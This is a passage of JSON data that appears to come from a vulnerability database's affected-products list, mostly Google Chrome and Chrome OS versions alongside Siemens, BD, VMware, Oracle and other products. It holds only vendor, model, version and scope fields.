{ "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.945.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "52.0.2743.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "44.0.2403" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.895.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.355.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "57.0.2987.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.44" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.234" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.171" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.0" }, { "model": "pixel xl", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.650.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "51.0.2704.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.338.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.451.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.59" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.0" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "pyxis cubie replenishment station", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.6" }, { "model": "facssample prep assistant iii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.427.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1024" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.276.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.574.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "39.0.2171.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.320.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.946.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.888.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.5" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.224.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1678.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.33" }, { "model": "ruggedcom ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.704.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.60" }, { "model": "bactec fx40", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1035" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1291.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.3.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.57" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.632.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.158" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.328" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.2" }, { "model": "simatic et 200sp open controller", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.899.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1029" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.571.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.79" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1016070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1677.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.19" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.734.0" }, { "model": "kernel", "scope": "ne", "trust": 0.3, "vendor": "linux", "version": "4.14.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1310.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "pyxis transfusion verification", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.131.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.35" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.485.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.678.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.372.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.949.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.392.0" }, { "model": "enterprise linux server extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.212" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1063" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.710.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.206" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.568.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.735.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.487.0" }, { "model": "workstation", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "12.5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.129" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.590.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.23" }, { "model": "carrier routing system 6.6.0.base", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.332.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.953.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1071.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1013.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.73" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "61.0.3163.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.340.0" }, { "model": "facsaria fusion", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.373.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.87" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.32" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.0" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.353.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "61.0.3163.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.43" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.461.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.470.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.446.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.357.0" }, { "model": "enterprise linux for power big endian extended update support", 